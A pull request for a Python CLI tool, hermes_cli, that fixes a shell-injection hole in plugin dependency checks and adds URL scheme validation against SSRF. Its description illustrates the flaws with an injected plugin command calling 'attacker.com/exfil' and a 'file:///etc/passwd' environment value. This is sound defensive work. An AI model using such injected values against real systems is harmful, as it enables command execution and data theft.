### PR TITLE
fix(security): prevent shell injection and SSRF via URL scheme validation

### DIFF
--- a/hermes_cli/memory_setup.py
+++ b/hermes_cli/memory_setup.py
@@ -57,6 +57,7 @@ def _prompt(label: str, default: str | None = None, secret: bool = False) -> str
 
 def _install_dependencies(provider_name: str) -> None:
     """Install pip dependencies declared in plugin.yaml."""
+    import shlex
     import subprocess
     from plugins.memory import find_provider_dir
 
@@ -134,7 +135,7 @@ def _install_dependencies(provider_name: str) -> None:
         if check_cmd:
             try:
                 subprocess.run(
-                    check_cmd, shell=True, capture_output=True, timeout=5
+                    shlex.split(check_cmd), shell=False, capture_output=True, timeout=5
                 )
             except Exception:
                 if install_cmd:

--- a/hermes_cli/web_server.py
+++ b/hermes_cli/web_server.py
@@ -320,7 +320,27 @@ class EnvVarReveal(BaseModel):
     key: str
 
 
-_GATEWAY_HEALTH_URL = os.getenv("GATEWAY_HEALTH_URL")
+def _require_http_url(url: str | None, name: str) -> str | None:
+    """Return *url* only if its scheme is http or https; log and return None otherwise.
+
+    Prevents SSRF via ``file://``, ``ftp://``, or other unexpected schemes
+    when environment-variable-supplied URLs are passed to ``urllib.request.urlopen``.
+    """
+    if url is None:
+        return None
+    parsed = urllib.parse.urlparse(url)
+    if parsed.scheme not in ("http", "https"):
+        import logging as _logging
+        _logging.getLogger(__name__).warning(
+            "%s rejected: only http/https schemes are allowed (got %r)",
+            name,
+            parsed.scheme or "(empty)",
+        )
+        return None
+    return url
+
+
+_GATEWAY_HEALTH_URL = _require_http_url(os.getenv("GATEWAY_HEALTH_URL"), "GATEWAY_HEALTH_URL")
 _GATEWAY_HEALTH_TIMEOUT = float(os.getenv("GATEWAY_HEALTH_TIMEOUT", "3"))
 
 

--- a/hermes_cli/webhook.py
+++ b/hermes_cli/webhook.py
@@ -15,6 +15,7 @@ import os
 import re
 import secrets
 import time
+import urllib.parse
 from pathlib import Path
 from typing import Dict
 
@@ -237,6 +238,11 @@ def _cmd_test(args):
     sig = "sha256=" + hmac.new(
         secret.encode(), payload.encode(), hashlib.sha256
     ).hexdigest()
+
+    parsed = urllib.parse.urlparse(url)
+    if parsed.scheme not in ("http", "https"):
+        print(f"  Error: webhook URL scheme must be http or https (got {parsed.scheme!r})")
+        return
 
     print(f"  Sending test POST to {url}")
     try:


### PR DESCRIPTION
## Summary

Static analysis (bandit) identified three security vulnerabilities in `hermes_cli/`. This PR fixes all of them with minimal, targeted changes.

---

### [HIGH] Shell injection via plugin metadata — `memory_setup.py` (B602)

**File:** `hermes_cli/memory_setup.py:137`

`subprocess.run(check_cmd, shell=True)` was called where `check_cmd` is read directly from a plugin's `plugin.yaml` `external_dependencies[].check` field. A malicious plugin could supply a value like `check_cmd: "git --version; curl http://attacker.com/exfil"` and have it executed as a shell command on the user's machine.

**Fix:** Use `shlex.split(check_cmd)` to parse the command into a list and pass `shell=False`, so no shell interpretation occurs.

```python
# Before
subprocess.run(check_cmd, shell=True, capture_output=True, timeout=5)

# After
subprocess.run(shlex.split(check_cmd), shell=False, capture_output=True, timeout=5)
```

---

### [MEDIUM] SSRF via unvalidated `GATEWAY_HEALTH_URL` env variable — `web_server.py` (B310)

**File:** `hermes_cli/web_server.py:354`

`os.getenv("GATEWAY_HEALTH_URL")` was passed directly to `urllib.request.urlopen` without validating the URL scheme. An attacker who can influence the environment (e.g. via a compromised `.env` file or container environment injection) could set `GATEWAY_HEALTH_URL=file:///etc/passwd` to trigger a local file read that may surface in error responses.

**Fix:** Added `_require_http_url()` helper that rejects any URL whose scheme is not `http` or `https`, logs a warning, and returns `None`.

---

### [MEDIUM] URL scheme not validated before `urlopen` in webhook test — `webhook.py` (B310)

**File:** `hermes_cli/webhook.py:254`

The webhook test target URL was constructed from user-configured host/port values without validating the scheme before passing to `urllib.request.urlopen`.

**Fix:** Added an explicit scheme check using `urllib.parse.urlparse(url).scheme` before making the request; non-http/https URLs are rejected with a clear error message.

---

## Test plan

- [ ] Run `bandit -r hermes_cli/ -ll` — all three issues should be resolved
- [ ] `hermes memory setup` still correctly detects missing external dependencies
- [ ] Gateway health probe works normally when `GATEWAY_HEALTH_URL=http://localhost:8642`
- [ ] `hermes webhook test <name>` sends the test POST as expected
- [ ] Setting `GATEWAY_HEALTH_URL=file:///etc/passwd` is rejected with a warning log and no request is made

Made with [Cursor](https://cursor.com)